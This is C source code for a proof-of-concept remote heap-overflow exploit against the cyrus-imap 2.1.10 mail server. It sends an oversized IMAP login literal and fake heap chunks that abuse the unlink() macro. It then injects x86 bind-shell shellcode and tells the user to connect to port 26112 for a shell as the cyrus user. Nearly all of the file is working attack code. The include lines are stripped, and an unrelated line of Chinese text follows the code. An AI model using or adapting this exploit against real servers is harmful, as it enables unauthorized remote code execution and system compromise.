/* cyrus-imap exploit . gives uid cyrus */ /* tested on slack linux 8.0: cyrus-imap 2.1.10 , glibc-2.2.3 ,kernel 2.4.19 */ /* irian@antisocial.com */ /* */ /* please don't distro . i don't want this crap on any website. */ /* this is PoC state. it will get better. */ #include #include #include char shellcode[]= "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80\x43" "\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1\xb3\x04" "\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52" "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; struct sockaddr_in sck; struct hostent *hp; long inet; int sock; char *target[128]; int openconn(char *target,int port){ sock = socket (PF_INET, SOCK_STREAM, 0); if (!sock) { perror ("socket()"); return 0 ; } inet = inet_addr (target); if (inet == -1) { if (hp = gethostbyname (target)) memcpy (&inet, hp->h_addr, 4); else inet = -1; if (inet == -1) { fprintf (stderr, "can't resolve %s \n", target); return 0 ; } } sck.sin_family = PF_INET; sck.sin_port = htons (port); sck.sin_addr.s_addr = inet; if (connect (sock, (struct sockaddr *) &sck, sizeof (sck)) < 0) { perror ("connect() "); return 0; } return 1 ; } main(int argc,char *argv []){ int port=143; char sploit[512]; char instr[]="x login {4294967295}\r\n"; //2^32 char readbuf[512]; memset(sploit,0,sizeof(sploit)); memset(readbuf,0,sizeof(readbuf)); strcpy(sploit,instr); strcat(sploit,"\x04\xf4\x11\x08\x04\xf4\x11\x08"); // fake chunks strcat(sploit,"\xf0\xff\xff\xff\xfc\xff\xff\xff"); strcat(sploit,"\x04\xf5\x11\x08\x04\xf5\x11\x08"); strcat(sploit,"\xf0\xff\xff\xff\xfc\xff\xff\xff"); strcat(sploit,"\x50\xb9\x10\x08\x48\xf6\x11\x08"); // feed it to unlink() macro //^retloc-12 ^shellcode addy strcat(sploit,"\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"); strcat(sploit,shellcode); fprintf(stderr,"%d bytes\n",strlen(sploit)); if (!openconn("127.0.0.1",port)) exit(-1); fprintf(stderr,"connected. press a key to send the stuff...\n"); getchar(); write(sock,sploit,strlen(sploit)); read(sock,readbuf,511); fprintf(stderr,"%s",readbuf); close(sock); fprintf(stderr,"exploit done. now connect to port 26112\n"); }

亚洲欧美在线